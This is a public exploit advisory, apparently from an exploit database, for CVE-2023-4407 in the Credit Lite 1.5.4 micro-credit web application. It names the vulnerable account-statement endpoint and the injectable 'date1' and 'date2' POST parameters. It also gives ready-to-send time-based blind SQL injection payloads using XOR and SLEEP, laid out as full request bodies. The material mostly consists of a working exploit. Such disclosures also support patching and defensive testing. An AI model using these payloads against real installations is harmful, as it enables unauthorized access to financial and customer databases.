# Exploit Title: Credit Lite 1.5.4 - SQL Injection# Exploit Author: CraCkEr# Date: 31/07/2023# Vendor: Hobby-Tech# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392# Software Link: https://credit-lite.appshat.xyz/# Version: 1.5.4# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4407# CWE: CWE-89 - CWE-74 - CWE-707## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.## Steps to Reproduce:
To Catch the POST Request
1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement
2. Select [Start Date]+[End Date]+[Account Number]and Click on [Filter]
Path:/portal/reports/account_statement
POST parameter 'date1'is vulnerable to SQL Injection
POST parameter 'date2'is vulnerable to SQL Injection
-------------------------------------------------------------------------
POST /portal/reports/account_statement HTTP/2
_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001----------------------------------------------------------------------------
Parameter: date1 (POST)
Type: time-based blind
Title: MySQL >=5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001
Parameter: date2 (POST)
Type: time-based blind
Title: MySQL >=5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001---[-] Done
